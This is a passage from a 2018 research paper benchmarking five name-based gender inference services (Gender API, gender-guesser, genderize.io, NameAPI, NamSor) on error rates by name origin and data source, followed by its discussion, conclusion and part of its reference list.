misclassifications, and non- classifications per service on the entire data set in Table 3, whereas Table 4 shows values of the various quality metrics. Gender API exhibits the lowest fraction of inaccuracies, at 7.9%. It also achieves the smallest proportion of non-classified names, a mere 3%. For both metrics, NamSor is the next best performer, closely followed by genderize.io. Note that the databases of Gender API and NamSor are about one order of magnitude larger than those of gender-guesser and genderize.io, therefore it is not surprising that they achieve a larger ratio of classified names. Incidentally, NameAPI incurs a comparatively high non-classification error, despite its relatively extensive database. Regarding the metrics that ignore predicted ‘unknowns’ altogether, Python package gender-guesser achieves the best results, with only 2.6% of misclassifications, followed by NameAPI. This means that, when considering only the proper classifications in the confusion matrix, these services minimize the number of elements outside the diagonal. In other words, they produce the least number of misclassifications when ignoring the non-classifications. This is indicative of a high-quality data curation when incorporating names into the database. Regarding the error in gender bias, the worst offenders are genderize.io and Gender API, although in reverse directions; while the former wrongly identifies more men as women, the latter does the opposite, which means that results Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 16/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Table 3 Confusion matrices for all services using their default responses without parameter tuning. mpred fpred upred (a) Gender API m 3,573 110 128 f 172 1,750 46 (b) gender-guesser m 2,964 66 781 f 56 1,530 382 (c) genderize.io m 3,210 189 412 f 73 1,744 151 (d) NameAPI m 3,126 93 592 f 75 1,616 277 (e) NamSor m 3,354 132 325 f 94 1,684 190 Table 4 Benchmark 1a: performance metrics for all services with their default gender assignments on the entire data set. The weightedError is computed with w =0.2. errorCoded errorCodedWithoutNA errorGenderBias naCoded weightedError Gender API 0.0789 0.0503 −0.0111 0.0301 0.0562 gender-guesser 0.2224 0.0264 0.0022 0.2012 0.0731 genderize.io 0.1428 0.0502 0.0222 0.0974 0.0703 NameAPI 0.1794 0.0342 0.0037 0.1504 0.0672 NamSor 0.1282 0.0429 0.0072 0.0891 0.0613 obtained with Gender API may underestimate the amount of females. Finally, measured in terms of the weighted error with w =0.2, all services perform quite similarly, with Gender API producing the lowest error. It is perhaps necessary to point out that, despite the high accuracy level of various gender predictions according to the services’ responses, some persons indeed remain misclassified. We can provide several examples extracted from our analysis: ‘Dana’ is thought to be female with 91% accuracy by Gender API, 0.98 confidence by NameAPI, and 0.92 probability by genderize.io, while NamSor more conservatively sets its scale to 0.16. In fact, our test data set includes a male ‘Dana’. Similarly ‘Michal’, the name of a female researcher, is classified as male with 97% accuracy by Gender API, 0.93 confidence by NameAPI, -0.91 scale by NamSor, and 0.75 probability by genderize.io. Ultimately it all comes down to internal heuristics and the way each service weights the counts for a particular name from their multiple data sources. Thus it is unavoidable to end up with a number of misclassified names, and this should be taken into account when making absolute claims about the validity of results based on these services. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 17/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Af ric a As ia Eu ro pe 50 60 70 80 90 100 A. Gender API Af ric a As ia Eu ro pe 0.0 0.2 0.4 0.6 0.8 1.0 B. gender-guesser Af ric a As ia Eu ro pe 0.75 0.80 0.85 0.90 0.95 1.00 C. genderize.io Af ric a As ia Eu ro pe 0.6 0.7 0.8 0.9 1.0 D. NameAPI Af ric a As ia Eu ro pe 0.0 0.2 0.4 0.6 0.8 1.0 E. NamSor Figure 3 Boxplots depicting quartiles for the confidence parameters of the gender inference services, split by geographical regions Africa, Asia, and Europe as returned by NamSor’s origin API. Panels (A), (B), (C), (D), and (E) display parameters accuracy of Gender API, self-constructed confidence of gender- guesser, probability of genderize.io, confidence of NameAPI and scale of NamSor, respectively. The bottom and top of the colored boxes mark the first and third quartiles of the distribution; the line in the middle of the boxes indicates the median; the ends of the whiskers correspond to the lowest and highest data points within 1.5 interquartile range. Full-size DOI: 10.7717/peerjcs.156/fig-3 Benchmark 1b: analysis by name origin and data source Next, we investigate the impact of the names’ origin on the performance of the services under evaluation. As described above, all services return a confidence parameter indicating the trustworthiness of the classification; recall that for Python package gender-guesser we have created one such parameter by setting it to 0.75 for responses ‘mostly_female’ or ‘mostly_male’ and 1 for ‘female’ or ‘male’. We investigate the confidence parameters for different geographical origins of the test names. The boxplots in Fig. 3 show statistics from the quartiles of the parameters’ distributions, split by the top regions predicted by NamSor’s origin API. Note that all services produce responses that are discernibly dependent on the names’ origin: the most confident gender predictions are for names of European origin, while Asian names generally lead to a lower median and a higher deviation. The service NameAPI displayed in Fig. 3D stands out insofar as the medians of confidence values are lower than those of the other services, indicating a different kind of normalization. This is in accordance with the bimodal parameter distribution peaking at around 0.90 which is depicted in Fig. 2A. There is also little difference between the median values for all three geographical regions, suggesting that NameAPI’s confidence parameter is not as useful to discriminate among easy versus complex cases. It is also worth noting in Fig. 3C that service genderize.io assigns gender to Asian names with significantly higher confidence values than the other services: the median value for Asian names is surprisingly almost as high as for European names. The lower confidence in gender assignments for Asian names reported by almost all services suggests focusing on that case. As shown in Fig. 4, which displays results broken down by Asian subregions, names from Eastern and Southeastern Asia yield significantly smaller values than other Asian regions. This is to be expected, in particular due to Chinese names for which the difficulty of inferring a gender of Latin transcriptions is well known. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 18/29 https://peerj.com https://doi.org/10.7717/peerjcs.156/fig-3 http://dx.doi.org/10.7717/peerj-cs.156 Ce nt ra l A si a Ea st er n As ia So ut h- Ea st er n As ia So ut he rn A si a W es te rn A si a 50 60 70 80 90 100 A. Gender API Ce nt ra l A si a Ea st er n As ia So ut h- Ea st er n As ia So ut he rn A si a W es te rn A si a 0.0 0.2 0.4 0.6 0.8 1.0 B. gender-guesser Ce nt ra l A si a Ea st er n As ia So ut h- Ea st er n As ia So ut he rn A si a W es te rn A si a 0.6 0.7 0.8 0.9 1.0 C. genderize.io Ce nt ra l A si a Ea st er n As ia So ut h- Ea st er n As ia So ut he rn A si a W es te rn A si a 0.6 0.7 0.8 0.9 1.0 D. NameAPI Ce nt ra l A si a Ea st er n As ia So ut h- Ea st er n As ia So ut he rn A si a W es te rn A si a 0.0 0.2 0.4 0.6 0.8 1.0 E. NamSor Figure 4 Boxplots depicting quartiles for the confidence parameters of the gender inference services for Asian subregions as returned by NamSor’s origin API, with boxplot settings as in Fig. 3. Full-size DOI: 10.7717/peerjcs.156/fig-4 Table 5 Benchmark 1b, name origin: performance of all services with their default gender assign- ments in terms of the metrics errorCoded and errorCodedWithoutNA, broken down by name origin. Values are rounded to four decimal figures. errorCoded errorCodedWithoutNA Africa Asia Europe Africa Asia Europe Gender API 0.0538 0.1759 0.0281 0.0469 0.112 0.0213 gender-guesser 0.2437 0.5171 0.0752 0.0365 0.0641 0.0147 genderize.io 0.1039 0.3282 0.0507 0.053 0.1206 0.0218 NameAPI 0.1505 0.3772 0.0807 0.0405 0.0897 0.0136 NamSor 0.0645 0.3459 0.0273 0.044 0.0903 0.0211 Nonetheless, while NamSor and gender-guesser have almost no confidence in the gender inference of East Asian names, Gender API shows a notably high median value. NameAPI and genderize.io again exhibit similar medians for all subregions, confirming that the values of their confidence parameters are decoupled from the names’ origins, and thus from the complexity of the assignment. This fact makes us doubt that NameAPI’s confidence and genderize.io’s probability parameters are sufficiently significant. Table 5 quantifies errors incurred by the different services depending on the names’ origin. Gender API achieves the best results for errorCoded, however its performance is strongly affected by the names’ origin, being one order of magnitude worse for Asian (18% inaccuracies) than for European names (3%). NamSor performs similarly for European (3%) and African names (7%), but is considerably worse for Asian ones (35%). Regarding the fraction of misclassifications (errorCodedWithoutNA) we note that gender-guesser, with its small but highly accurate database, achieves a mere 1.5% error in classifying European names, while for Asian names the figure increases to 6%. Generally speaking, we conclude that all services clearly show the challenging nature of inferring gender for Asian names. Next let us consider errors in gender inference depending on the source of the names as displayed in Table 6. For both errors all services perform much worse on the wos data subset Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 19/29 https://peerj.com https://doi.org/10.7717/peerjcs.156/fig-4 http://dx.doi.org/10.7717/peerj-cs.156 Table 6 Benchmark 1b, data source: Performance of all services with their default gender assignments in terms of the metrics errorCoded and errorCodedWithoutNA, broken down by data source. Values are rounded to four decimal figures. errorCoded errorCodedWithoutNA zbmath genderize_r_ authors genderize_r_ titles pubmed wos zbmath genderize_r_ authors genderize_r_ titles pubmed wos Gender API 0.0086 0.0289 0.034 0.04 0.1327 0.0029 0.0123 0.0173 0.0294 0.0853 gender-guesser 0.0659 0.0795 0.0787 0.1154 0.3699 0.0031 0.0052 0.0137 0.0105 0.0544 genderize.io 0.0659 0.0675 0.0809 0.0697 0.2296 0.0091 0.0203 0.0336 0.0235 0.0872 NameAPI 0.063 0.0988 0.0723 0.103 0.283 0.018 0.0158 0.0113 0.021 0.0572 NamSor 0.043 0.0289 0.0404 0.0697 0.214 0.006 0.0123 0.0217 0.024 0.0741 Table 7 Benchmark 2a: Minimization of inaccuracies constrained to a 5% misclassification error on the entire data set. Displayed are the mean and standard deviation of the values of errorCoded for all ser- vices, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor mean 0.0867 0.2224 0.1454 0.1842 0.1359 std 0.0027 0.0000 0.0010 0.0011 0.0023 than on the others. This is in accordance with the fact that the wos collection incorporates a higher percentage of Asian names, as evidenced by Fig. 1. Regardless, the results follow the general trend: Gender API achieves the smallest fraction of inaccuracies for all data sources, whereas gender-guesser often beats other services in terms of misclassifications. Overall we conclude that the breakdown of errors by data source is consistent with the analysis split by names’ origin. Data sets composed of Western names have a much larger chance of being correctly attributed a gender than Asian ones. Benchmark 2: Minimization of inaccuracies constrained to a 5% misclassification error We measure the performance of all services with respect to the fraction of inaccuracies (errorCoded) under the constraint that at most 5% of all successfully classified names are misclassified as female or male, i.e., they fulfill errorCodedWithoutNA < 0.05. This is a realistic constellation for applications requiring the rate of misclassifications not to exceed a given threshold. Benchmark 2a: entire data set We apply our parameter tuning procedure to minimize errorCoded on the entire data set and display the averaged test errors per service in Table 7. In each of the 10 runs of 10-fold cross-validation, Gender API produces the lowest error, NamSor the second lowest. In this scenario, it is possible to achieve an average inaccuracy rate under 9% over the whole data set while keeping the misclassification error under 5% with Gender API. NamSor and genderize.io achieve second place with average inaccuracy rates just under 15%. In order to assess whether the difference in performance is statistically significant, we apply a two-matched-samples t-test to the results of the two best services. Since our data set is relatively large and the data sets have been obtained by random sampling, one needs to Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 20/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Table 8 Benchmark 2b: minimization of inaccuracies constrained to a 5% misclassification error. Dis- played are the values of errorCoded for all services and data sources, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor zbmath 0.0085 0.0658 0.0687 0.1601 0.0429 genderize_r_authors 0.029 0.0798 0.0797 0.1037 0.0291 genderize_r_titles 0.0339 0.0787 0.083 0.0741 0.0402 pubmed 0.04 0.1154 0.0697 0.103 0.0697 wos 0.2197 0.4478 0.3304 0.5563 0.2758 show that the assumption of homogeneity of variance is satisfied prior to applying a t-test (see e.g., Japkowicz & Shah (2014) (p. 222ff)). Levene’s test applied to the errors of Gender API and NamSor yields a large p-value of 0.68, and so we conclude that there is (almost) no difference between their variances. The t-test returns a very small p-value < 0.01, while the absolute value of Cohen’s d-statistic is 19.1. This means that Gender API’s error is statistically significantly lower than NamSor’s and the effect size is large. The parameter tuning procedure on the entire data set for this benchmark leads to optimal parameters close to the default case, maximizing the number of names that are assigned a gender; for instance, the optimal values for Gender API’s accuracy and samples are 57 and 62, respectively, while NamSor’s scale is tuned to 0.13. Benchmark 2b: analysis by data source For the split analyses we perform one run of 10-fold cross-validation per service and data source; results are displayed in Table 8 and show that Gender API is the best performer in all cases. Incidentally, all services achieve one order of magnitude worse results on the data set wos than on the others. NameAPI and gender-guesser did in fact repeatedly fail to satisfy the constraint, in which case we had to set the error to 1 for the respective fold. We have applied the Friedman test with the result that the difference in performance among services is statistically significant at significance level 0.01. As a post-hoc test we have applied the Nemenyi test in order to find out which classifiers actually differ. However, the Nemenyi test is not powerful enough to detect statistical significance between any classifiers except Gender API and NameAPI. Since we are particularly interested in the best performers, we have compared Gender API and NamSor using the sign test instead, which counts the number of data sets on which the one classifier outperforms the other. Accordingly, Gender API is significantly better than NamSor at the confidence level 0.05. Benchmark 3: Minimization of misclassifications constrained to a 25% non-classification rate Next we evaluate the effectiveness for achieving correct classifications, i.e., we minimize the rate of misclassifications (errorCodedWithoutNA) constrained to the amount of names that cannot be classified being lower than 25% of all assignments (naCoded < 0.25). This represents a rather frequent situation of wanting to incur as few misclassifications as possible, while at the same time being able to assign a gender to at least a pre-defined fraction of the evaluated names. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 21/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 3We have applied the sign test to the test errors in the first trial, since multiple trials violate the independent domain assumption. Gender API outperforms NamSor in seven of 10 folds but this is not significant in terms of the sign test which would require eight folds. Table 9 Benchmark 3a: Minimization of misclassifications constrained to a 25% non-classification rate on the entire data set. Displayed are the mean and the standard deviation of errorCodedWithoutNA for all services, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor mean 0.0088 0.0229 0.0174 0.0302 0.0139 std 0.0015 0.0000 0.0048 0.0009 0.0000 Table 10 Benchmark 3b: Minimization of misclassifications constrained to a 25% non-classification rate. Displayed are the values of errorCodedWithoutNA for all services and data sources, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor zbmath 0 0.0029 0.0061 0.0105 0 genderize_r_authors 0.0026 0.0051 0.0144 0.0085 0.0054 genderize_r_titles 0.0023 0.007 0.0173 0.0121 0.0098 pubmed 0.0037 0.0067 0.0037 0.0164 0.0065 wos 0.0395 1 0.0673 0.339 0.0454 Benchmark 3a: entire data set As shown in Table 9, Gender API outperforms the other services with a 0.9% misclassification rate, followed by NamSor with 1.4% and genderize.io with 1.7%. To achieve these results, the three services need to be tuned to optimal parameters with higher values of confidence (roughly accuracy > 90 and samples > 40,000; scale > 0.70; probability > 0.95 and count > 3,500, respectively). Since the variances of Gender API and NamSor are not similar, a t-test cannot be applied to measure the difference between the two best performers3. However, it can be applied to the comparison of Gender API and genderize.io, with the result that Gender API outperforms genderize.io significantly with large effect size. Benchmark 3b: analysis by data source For most of the analyzed data sources Gender API outperforms all other services; error figures are displayed in Table 10. On names from the pubmed collection, Gender API and genderize.io are equally good; on the zbmath subset, Gender API and NamSor achieve a perfect score. Again, all services perform one order of magnitude worse on names from wos than on the other subsets. NameAPI did not satisfy the constraint on various folds, gender-guesser in fact on none of them. As in Benchmark 2b, the Friedman test shows statistical significance at significance level 0.01. Neither the Nemenyi test nor the sign test confirm significance between the performance of Gender API and NamSor at level 0.05. We conclude that none of the tests considered suitable for comparing Gender API and NamSor are able to confirm that Gender API is statistically significantly better in this case. Benchmark 4: Minimization of the weighted error with w = 0.2 Finally we analyze the case of minimizing the weighted error with w =0.2, namely the metric that treats all inaccuracies (misclassifications and non-classifications) as errors, but Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 22/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Table 11 Benchmark 4a: Minimization of the weighted error with weight w = 0.2. Displayed are the mean and the standard deviation of the values of weightedError for all services, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor mean 0.0458 0.0732 0.0630 0.0674 0.0560 std 0.0045 0.0000 0.0017 0.0000 0.0011 Table 12 Benchmark 4b: Minimization of the weighted error with weight w = 0.2. Displayed are the values of weightedError for all services and data sources, rounded to four decimal figures. Gender API gender-guesser genderize.io NameAPI NamSor zbmath 0.0039 0.0166 0.0218 0.0293 0.0161 genderize_r_authors 0.013 0.0211 0.0269 0.0337 0.013 genderize_r_titles 0.0176 0.0321 0.0363 0.0251 0.022 pubmed 0.0243 0.0335 0.0273 0.0386 0.0315 wos 0.0791 0.1407 0.1122 0.1132 0.0986 puts five times more weight into the former. This corresponds to an intermediate situation between Benchmarks 1 and 2, and the approach has the flexibility of allowing a continuous range of values for the weight w, depending on the particular needs of each analysis. Benchmark 4a: entire data set The best results are achieved by Gender API and NamSor with weighted error values of 0.046 and 0.056, respectively, as shown in Table 11. Since the variance of the two best performers is almost equal, we can apply the t-test, which yields statistical significance at significance level 0.01. Also, Cohen’s d-statistic confirms that the difference in performance is practically relevant. As expected, the parameter tuning procedure on the entire data set leads to optimal parameters between those computed for the previous two benchmarks; for instance, the optimal values for Gender API’s accuracy and samples are 75 and 72,003, respectively, while NamSor’s scale is tuned to 0.41. Benchmark 4b: analysis by data source In Table 12 we present results from minimizing weightedError with weight w =0.2 for all services and data sources. Gender API is the best performing service on all data sets; NamSor reaches the second best values on four out of five data sources. The Friedman test shows that the performances are statistically significant at significance level of 0.01. Furthermore, the sign test shows that Gender API is significantly better than NamSor at significance level 0.05. DISCUSSION Name-based gender inference poses numerous challenges. To name a few, the association of a name with gender depends on the cultural and regional context, hence relying on the first name only can be highly error-prone. Transliteration from other alphabets into the Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 23/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Latin one is known to lead to significant losses of information, thereby excluding entire populations from a reliable classification. Incidentally, the gender of some names might depend not only on culture, but also on historical epoch, and so there exist names that were e.g., typically male in the past and are nowadays female or unisex. Furthermore, first names are per se embedded into the gender binary, hence this approach reinforces a non-inclusive gender concept and further marginalizes individuals that do not identify as women or men. Clearly, the best way to enrich personal data with this type of demographic information is to ask for self-identification. That would not only increase the correctness of the data; it is also to be preferred under ethical considerations, since it avoids the offensiveness of assigning categories to individuals, while allowing for inclusion of identities beyond the gender binary. Self-identification is not feasible though in large-scale studies of historical data that are typical for bibliometric analyses. Thus the usage of automated methods to infer gender from names or from alternative available details is unavoidable. For a thorough discussion of the ethics of gender identification, see Matias (2014) and references therein. Notwithstanding the above caveats, we have performed a comprehensive comparison of available gender inference tools, testing five services on a manually labeled data set containing 7,076 names, of which 5,779 have a definite gender and are subjected to our analyses. For our evaluations, it would have been desirable to use an open collection of names with labels obtained through self-identification. We are not aware of such a set, thus we have used data based on judgments of third parties. As described in the section ‘Assemblage of test data’ we have corrected a non-trivial amount of gender assignments, which unfortunately does not preclude potential remaining classification mistakes. Making the test data set public might help to correct them. Furthermore, we have assessed the geographical diversity of our test names, concluding that approximately half of them are of European origin, slightly less than half are Asian, and the remaining 5% are African. Names of persons from the American and Australian continents are considered to descend from these three main regions. We deem this distribution to be appropriate for the task at hand. We have devised and run various benchmarks to compare all five inference services in several scenarios. In particular, we have computed all performance metrics using the default responses without any further tuning. We have studied the default responses broken down by geographical origin of names and by data source. Additionally, we have performed parameter tuning to search for the optimal values of the confidence indicators that lead to minimization of misclassification or inaccuracy rates, while constraining the maximum error on the other quantity. We have broken down these analyses by data source as well. Finally, we have applied various tests to measure whether the observed differences in performance are statistically significant. Python package gender-guesser achieves the lowest misclassification rate without parameter tuning for the entire data set, introducing also the smallest gender bias. At the same time it shows poor performance in terms of non-classifications, which is understandable given its comparatively small data base. As the only completely free service with open data and logic, we reckon that it can be useful as a first step of a multi-stage Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 24/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 4Considering the problems arising with middle names, as described for Gender API and NamSor, it might make sense to drop them, or to query with only the first name when the genders of first and middle are in disagreement. gender inference procedure. Gender API is the best performer in terms of fraction of inaccuracies, and also in proportion of non-classifications. When breaking down results without parameter tuning by names’ origin we find out that all services perform at least one order of magnitude better on names of European origin than on Asian names. In particular, this translates to poorer results on the wos names subset, which is the less Eurocentric collection of all analyzed data sources. This confirms that assessments of errors in gender inference studies should be made with particular care when the cultural makeup of the analyzed names is unknown. For instance, the genderizeR data subsets employed in the analysis of Wais (2016) contain predominantly Western records, which is possibly at the root of the good results produced by a genderize.io service that, as we show, is not particularly well suited for inferring the gender of Asian names. In modern scholarly publications, the share of authors of Asian origin is significant though and thus this caveat needs to be addressed. Gender API typically achieves the best results after performing parameter tuning to optimize for particular scenarios. It is noteworthy to recall that, in contrast to NamSor and NameAPI, Gender API uses first names only. Using the tuned parameters of Gender API, it is possible to obtain a rate of inaccuracies of 8.7% constrained to not more of 5% of names being misclassified, a result significantly better than that achieved by the second best service NamSor. Likewise, the misclassification error can be made as low as 0.9% while still retaining a classification label for at least 75% of the entire data set. Next in performance is service NamSor, closely followed by genderize.io, both of which achieve a misclassification rate under 2% in that latter scenario. Our results indicate that analyses based on gender predictions by these methods are to be considered as more reliable than regular queries to country censuses or birth name lists. The addition of further benchmark settings based on supplementary performance metrics might be of interest. For instance, an appropriate measure would be the area under the ROC curve (AUC), which is particularly useful when one of the outcome classes is skewed, as is expected for authorships randomly drawn from databases in STEM disciplines. A disadvantage of the commercial services though is the lack of transparency regarding their data sources, specifically how records are gathered and processed. Furthermore, the algorithms behind the gender assignments are closed, too, while explanations are usually provided only on the level of technical usage, based on simple examples such as ‘John Smith’. Both aspects hamper efforts towards reproducibility of results. At the same time, given the substantial cost of some of the services, a better treatment of specific peculiarities like double names would be expected4. To give another example of trivial errors, NameAPI classifies ‘paul pinsky’ as female with confidence 0.99, while ‘Paul Pinsky’ or ‘Paul pinsky’ are returned as male with confidence 0.91. Hence, we recommend potential users to thoroughly test any given service with comprehensive examples before going into production. Our benchmarks and tests aim to provide first solid evidence of the services’ capabilities. For the presented benchmarks we have restricted to names containing at least a first and a last name. Yet the last name may sometimes suffice to infer the gender with high probability; this is e.g., the case for many (though not all) names from Russia or Poland. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 25/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 For those services that can handle them, it would be interesting to benchmark on a test set consisting of surnames only. Additionally, our data set contains only names in Latin characters although various services can handle (some) non-Latin alphabets, so it might be desirable to extend the data set in this direction as well. Furthermore, one could expand the study to include more samples of the same first name and test the dependency of gender inference on the last name. Lastly, there exist several more code packages or web services of interest: R package gender by Lincoln Mullen (Mullen, 2016) utilizes various openly available sources of first names with time range as an additional feature. As explained in Blevins & Mullen (2015), for research of a longer time span, ‘‘the changing nature of naming practices’’ might need to be taken into consideration. CONCLUSION The determination of a person’ gender based solely on their name is not straightforward, yet it is a relevant task for plenty of applications, including but not limited to studies of women’s representation in tech, media, or academia. In particular, bibliometric analyses of scientific publications in various academic fields have mostly made use of compiled lists of names to label authors of articles as male or female. Less attention has been paid, though, to the quantification of the several errors that one can incur when doing so, or to the advantages of choosing one or another gender assignment method depending on the requirements of the analysis at hand. Our comparison of five gender inference services in terms of various performance metrics such as inaccuracy, misclassification, and non-classification error rates provides a solid estimation of the accuracy to be expected in name-to-gender inference tasks. Applying these metrics to our data set, which we break down according to the names’ geographical origin and data source, we estimate the errors incurred by the services according to the two variables. By performing cross-validated, randomized parameter tuning on a large genderized data set of scientific authors we demonstrate that with three of the surveyed services it is possible to guess the correct gender of more than 98% of names for which a female or male label is returned, while simultaneously leaving less than 25% of records unclassified. Our framework can be trivially extended to account for further gender inference methods. ACKNOWLEDGEMENTS We thank Casper Strømgren for granting us unlimited access to genderize.io and Markus Perl for extending us a discount offer for Gender API. We are indebted to Elian Carsenat for allowing us to freely access NamSor’s gender and origin APIs. We are grateful to researchers Vincent Larivière, Cassidy Sugimoto, and Kevin Bonham for sharing their labeled gender data. We thank Marco Tullney for comments on the submitted version. We acknowledge and appreciate the two anonymous referees for carefully reading the manuscript and suggesting substantial improvements. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 26/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Grants Programme of the International Council for Science (ICSU), through project ‘‘A Global Approach to the Gender Gap in Mathematical, Computing, and Natural Sciences: How to Measure It, How to Reduce It?’’. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Grants Programme of the International Council for Science (ICSU). Competing Interests The authors declare there are no competing interests. Author Contributions • Lucía Santamaría conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, prepared the paper for submission. • Helena Mihaljević conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, set up code and data repository. Data Availability The following information was supplied regarding data availability: Evaluation of name-based gender inference methods: https://github.com/ GenderGapSTEM-PublicationAnalysis/name-gender-inference REFERENCES Blevins C, Mullen L. 2015. Jane, John ... Leslie? A Historical Method for Algorithmic Gender Prediction. Digital Humanities Quarterly 9(3). Bonham KS, Stefan MI. 2017a. Gender in computational biology. Available at https: //github.com/kescobo/gender-comp-bio. Bonham KS, Stefan MI. 2017b. Women are underrepresented in computational biology: an analysis of the scholarly literature in biology, computer science and computational biology. PLOS Computational Biology 13(10):1–12 DOI 10.1371/journal.pcbi.1005134. Buolamwini J. 2017. How I’m fighting bias in algorithms. Available at https://www. media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ . Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 27/29 https://peerj.com https://github.com/GenderGapSTEM-PublicationAnalysis/name-gender-inference https://github.com/GenderGapSTEM-PublicationAnalysis/name-gender-inference https://github.com/kescobo/gender-comp-bio https://github.com/kescobo/gender-comp-bio http://dx.doi.org/10.1371/journal.pcbi.1005134 https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ http://dx.doi.org/10.7717/peerj-cs.156 Carsenat E. 2014. Onomastics to measure cultural bias in medical research. Available at https://blog.namsor.com/2014/08/28/onomastics-to-measure-cultural-bias-in- medical-research/ . Demšar J. 2006. Statistical comparisons of classifiers over multiple data sets. Journal of Machine Learning Research 7:1–30. Filardo G, Da Graca B, Sass DM, Pollock BD, Smith EB, Martinez MAM. 2016. Trends and comparison of female first authorship in high impact medical journals: observational study (1994–2014). BMJ 352:i847 DOI 10.1136/bmj.i847. Frietsch R, Haller I, Funken-Vrohlings M, Grupp H. 2009. Gender-specific patterns in patenting and publishing. Research Policy 38(4):590–599 DOI 10.1016/j.respol.2009.01.019. Hastie T, Tibshirani R, Friedman J. 2009. The elements of statistical learning. data mining, inference, and prediction. 2 edition. New York: Springer. Holman L, Stuart-Fox D, Hauser CE. 2018. The gender gap in science: how long until women are equally represented? PLOS Biology 16(4):1–20 DOI 10.1371/journal.pbio.2004956. Japkowicz N, Shah M. 2014. Evaluating learning algorithms. A classification perspective. New York: Cambridge University Press. Karimi F, Wagner C, Lemmerich F, Jadidi M, Strohmaier M. 2016. Inferring gender from names on the web: a comparative evaluation of gender detection meth- ods. In: Proceedings of the 25th international conference companion on world wide web, WWW’16 companion. Republic and Canton of Geneva, Switzerland: International World Wide Web Conferences Steering Committee, 53–54 DOI 10.1145/2872518.2889385. Larivière V, Ni C, Gingras Y, Cronin B, Sugimoto CR. 2013a. Bibliometrics: global gender disparities in science. Nature 504(7479):211–213 DOI 10.1038/504211a. Larivière V, Ni C, Gingras Y, Cronin B, Sugimoto CR. 2013b. Supplementary infor- mation to: global gender disparities in science (Comment in Nature 504, 211–213; 2013). Nature 504(7479) DOI 10.1038/504211a. Macharia S, Ndangam L, Saboor M, Franke E, Parr S, Opoku E. 2015. Who makes the news? Global media monitoring project 2015. Available at http://whomakesthenews. org/gmmp-2015. Matias JN. 2014. How to identify gender in datasets at large scales, ethically and respon- sibly. Available at https://civic.mit.edu/blog/natematias/best-practices-for-ethical- gender-research-at-very-large-scales. Matias JN, Szalavitz S, Zuckerman E. 2017. FollowBias: supporting behavior change toward gender equality by networked gatekeepers on social media. In: Proceedings of the 2017 ACM conference on computer supported cooperative work and social computing (CSCW’17). Association for Computing Machinery (ACM), 1082–1095 DOI 10.1145/2998181.2998287. Michael J. 2007. 40 000 Namen, Anredebestimmung anhand des Vornamens. c’t 17:182–183. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 28/29 https://peerj.com https://blog.namsor.com/2014/08/28/onomastics-to-measure-cultural-bias-in-medical-research/ https://blog.namsor.com/2014/08/28/onomastics-to-measure-cultural-bias-in-medical-research/ http://dx.doi.org/10.1136/bmj.i847 http://dx.doi.org/10.1016/j.respol.2009.01.019 http://dx.doi.org/10.1371/journal.pbio.2004956 http://dx.doi.org/10.1145/2872518.2889385 http://dx.doi.org/10.1038/504211a http://dx.doi.org/10.1038/504211a http://whomakesthenews.org/gmmp-2015 http://whomakesthenews.org/gmmp-2015 https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales http://dx.doi.org/10.1145/2998181.2998287 http://dx.doi.org/10.7717/peerj-cs.156 Michael J. 2008. Dictionary of first names and gender. Available at ftp://ftp.heise.de/pub/ ct/listings/0717-182.zip. Mihaljević H, Santamaría L. 2018. Evaluation of name-based gender inference methods. https://github.com/GenderGapSTEM-PublicationAnalysis/name-gender-inference. Mihaljević-Brandt H, Santamaría L, Tullney M. 2016. The effect of gender in the publication patterns in mathematics. PLOS ONE 11(10):1–23 DOI 10.1371/journal.pone.0165367. Mozaffarian M, Jamali HR. 2008. Iranian women in science: a gender study of scientific productivity in an Islamic country. Aslib Proceedings 60(5):463–473 DOI 10.1108/00012530810908193. Mullen L. 2016. gender: predict gender from names using historical data. Available at 